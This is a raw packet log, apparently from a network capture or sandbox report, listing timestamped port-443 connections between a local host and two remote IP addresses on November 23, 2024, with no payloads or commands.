Nov 23, 2024 07:09:23.916076899 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.916091919 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.916112900 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.916443110 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.916460037 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.916495085 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.916501999 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.916541100 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.916541100 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.924113989 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.924154997 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.924204111 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.924211979 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.924230099 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.924293041 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.925292015 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.925335884 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.925365925 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.925371885 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.925410032 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.925463915 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.927177906 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.927242994 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.927251101 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.927290916 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.932912111 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.932929993 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.933003902 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.933012962 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.933027983 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.933062077 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.934719086 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.934765100 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.934777975 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.934787035 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.934837103 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.937751055 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.937809944 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.937818050 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.937859058 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.941051960 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.941070080 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.941148043 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.941148043 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.941157103 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.941205978 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.942975044 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.943030119 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.943075895 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.943083048 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.943100929 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.943293095 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.944467068 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.944494009 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.944534063 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.944544077 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.944586992 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.944601059 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.948501110 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.948563099 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.948576927 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.948616982 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.949773073 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.949790955 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.949851990 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.949860096 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.949876070 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.949903965 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.951716900 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.951761961 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.951795101 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.951805115 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.951833010 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.951948881 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.954019070 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.954042912 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.954083920 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.954090118 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.954129934 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.954138994 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.958602905 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.958626986 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.958667040 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.958679914 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.958700895 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.958780050 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.960833073 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.960895061 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.960939884 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.960951090 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.960990906 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.961067915 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.961126089 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.961143970 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.961150885 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.961194038 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.961194992 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.962209940 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.962259054 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.962316990 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.962316990 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.962326050 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.962368011 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.970381975 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.970451117 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.970480919 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.970489979 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.970504045 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.970525980 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.971817970 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.971839905 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.971882105 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.971888065 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.971946955 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.971946955 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.974911928 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.974981070 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.974989891 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.975045919 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.981302023 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.981326103 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.981369972 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.981374979 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.981406927 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.981460094 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.985517025 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.985584974 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.985590935 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.985631943 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.990295887 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.990315914 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.990370035 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.990375996 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.990401983 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.990479946 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.999794960 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.999816895 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.999902964 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.999902964 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.999908924 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.999969959 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.008069992 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.008090019 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.008191109 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.008197069 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.008208990 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.008253098 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.060096025 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.060179949 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.060199022 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.060256004 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.067753077 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.067836046 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.067851067 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.067920923 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.075232983 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.075310946 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.075340986 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.075401068 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.084789991 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.084865093 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.084881067 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.084933996 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.091769934 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.091844082 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.091872931 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.091934919 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.097506046 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.097582102 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.097596884 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.097672939 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.097795963 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.097816944 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.097898006 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.097898960 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.097912073 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.097946882 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.102404118 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.102478981 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.102493048 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.102554083 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.105320930 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.105338097 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.105658054 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.105667114 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.105704069 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.106188059 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.106272936 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.106287003 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.106338024 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.109844923 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.109916925 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.109930992 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.110001087 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.110265970 CET	443	49744	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.110549927 CET	49744	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.110608101 CET	443	49744	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.110842943 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.110912085 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.110944986 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.110953093 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.110987902 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.111025095 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.111701965 CET	443	49744	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.111764908 CET	49744	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.112267971 CET	443	49743	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.112544060 CET	49743	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.112562895 CET	443	49743	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.112725019 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.112740993 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.112786055 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.112792969 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.112814903 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.112839937 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.113058090 CET	49744	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.113136053 CET	443	49744	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.113234043 CET	49744	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.113253117 CET	443	49744	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.114197969 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.114274025 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.114298105 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.114351988 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.116137028 CET	443	49743	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.116205931 CET	49743	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.116585016 CET	49743	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.116765022 CET	443	49743	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.116787910 CET	49743	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.119021893 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.119102001 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.119118929 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.119184017 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.119246006 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.119261980 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.119293928 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.119301081 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.119308949 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.119333982 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.119347095 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.119350910 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.119385004 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.119390011 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.119441032 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.119441032 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.122754097 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.122819901 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.122836113 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.122903109 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.126559019 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.126568079 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.126627922 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.126631021 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.126646042 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.126671076 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.126671076 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.126681089 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.126688004 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.126701117 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.126728058 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.126743078 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.126753092 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.126774073 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.126816034 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.131387949 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.131458998 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.131473064 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.131530046 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.133668900 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.133691072 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.133749008 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.133758068 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.133771896 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.133821964 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.135052919 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.135082960 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.135097980 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.135129929 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.135137081 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.135185957 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.135201931 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.135211945 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.135211945 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.135267973 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.141104937 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.141125917 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.141223907 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.141233921 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.141278982 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.143007994 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.143059969 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.143100023 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.143105030 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.143188000 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.148557901 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.148577929 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.148632050 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.148638964 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.148659945 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.148705959 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.151532888 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.151582956 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.151602983 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.151612043 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.151659966 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.151659966 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.157938957 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.157965899 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.158025980 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.158035994 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.158062935 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.158081055 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.158113003 CET	49744	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.158303976 CET	49743	443	192.168.2.6	142.250.181.100
Nov 23, 2024 07:09:24.158315897 CET	443	49743	142.250.181.100	192.168.2.6
Nov 23, 2024 07:09:24.159913063 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.159940004 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.159981012 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.159987926 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.160079956 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.166659117 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.166680098 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.166739941 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.166749001 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.166804075 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.167340040 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.167356968 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.167397022 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.167404890 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.167434931 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.167469025 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.175591946 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.175614119 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.175689936 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.175695896 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.175713062 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.175810099 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.183280945 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.183305979 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.183358908 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:24.183366060 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:24.183392048 CET	49733	443	192.168.2.6	150.171.27.10
